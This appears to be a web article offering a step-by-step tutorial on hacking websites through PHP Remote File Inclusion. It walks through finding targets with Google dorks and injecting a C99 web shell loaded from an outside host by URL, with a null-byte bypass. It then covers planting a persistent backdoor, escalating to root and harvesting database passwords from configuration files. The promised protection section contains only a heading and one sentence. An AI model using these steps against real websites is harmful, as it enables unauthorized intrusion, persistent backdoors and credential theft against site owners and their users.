Main » Articles » Web Hacking » RFI |
Hello friends, Today i am going to explain and advanced method of hacking websites that is How to hack websites using Remote File Inclusion. As the name suggests Remote File Inclusion is technique where we inserts the file (in hacking terminology called Shell) in to the Website and gets the admin rights. Lets discuss this type of Website hacking technique in detail, so friends read on…
What is Remote File Inclusion?Remote File Inclusion is a method of hacking websites and getting the admin rights of the server by inserting a remote file usually called as SHELL (a shell is graphical user interface file which is used to browsing the remote files and running your own code on the web servers) into a website, whose inclusion allows the hackers to execute the server side commands as a current user logged on, and have the access to all the server files. With these rights we can continue to use local exploits to escalate our privileges and get control over the whole server. Which Websites are Vulnerable to Remote File Inclusion attack?First and the very basic question arises in the mind of new hackers that How we can find the websites that its prone to remote file inclusion attack. And what are the basic vulnerabilities in the website that we will target to hack any website and web server. Answer to these questions is quite simple. Now lets start step by step Remote file inclusion method to hack websites:Step 1: Finding the Vulnerable WebsitesFirst of all we have to find the website that gets his pages using the PHP include() function and vulnerable to RFI (Remote File Inclusion). The best technique is to find websites using Google Dorks. Google dorks are simply the queries that are used to identify the specific search results. I have already listed a lot off GOOGLE DORKS in my previous post of hacking websites, so you can look them here: Step 2: Identifying Vulnerable websiteWebsites that have the page navigation system similar to below mentioned: http://target-site.com/index.php?page=PageName Step 3: Checking Website is Vulnerable or NotTo check if a the website is vulnerable to remote file inclusion attack, we would try to include a website link instead of PageName as shown below: http://target-site.com/index.php?page=http://google.com Now if the Google Home Page opens, then its confirmed that website is vulnerable to Remote File Inclusion attack and we will continue our attack. If Google homepage doesn’t opens, we will try another website. Step 4: Remote Inclusion of ShellsNow we know that website is hackable, so we will now include the shells into the website. There are number of shells available online but my favorite are C99 and r57 because of their extended functionality and features. inurl:c99.txt This will display many websites with the shell already up and ready to be included. For future use of Analysis you can download these shells from here: The new URL with the shell included would look like: http://target-site.com/index.php?page=http://site.com/c99.txt? Step 5: Adding Null ByteSometimes the PHP script on the server appends ".php” to the end of every included file. So if you included the shell, it would end up looking like "c99.txt.php” and not work. To get around this, you would add a null byte () to the end of c99.txt. This tells the server to ignore everything after c99.txt. Step 6: Vulnerabilities DatabaseIn step one, I told you that hackers use Google dorks to look for sites possibly vulnerable to RFIs. An example of a Google dork would be: allinurl:.php?page= This looks for URL’s with .php?page= in them. This is only an example and you most likely won’t find any vulnerable sites with that search. You can try switching around the word "page” with other letters and similar Hackers usually search vulnerability databases likewww.milw0rm.com for already discovered RFI vulnerabilities in site content management systems and search for websites that are running that vulnerable web application with a Google dork. Step 6: If Attack SuccessfulIf we succeeds in getting the server to parse the shell, then we will be see a screen similar to the following: hacking websites using remote file inclusion, learn how to hack websites The shell will display information about the remote server and list all the files and directories on it. From here we would find a directory that has read and write privileges and upload the shell but this time as a .php file so that incase the vulnerability is fixed, he will be able to access it later on. Step7: Find Root Privileges on ServerNow we would next find a way to gain root privileges on the system. We can do this by uploading and running local exploits against the server. you can find list of such exploits on milw0rm. We could also search the victim server for configuration files. These files most of the times contain username and passwords for the MYSQL databases and such. That’s all the way to hack websites using the remote file inclusion method. I hope you all have liked it. And i am sure you all have a lot of questions regrading this, so don’t hesitate and ask in form of comments. I will try to clear all your queries. How to Protect your Websites and Forums from Remote file inclusion attack?As we are ethical hackers i will also explain for webmasters to protect their websites from RFI attack. | |
Views: 2169 | Comments: 10 | Rating: 4.0/1 |
Total comments: 6 | ||||||
| ||||||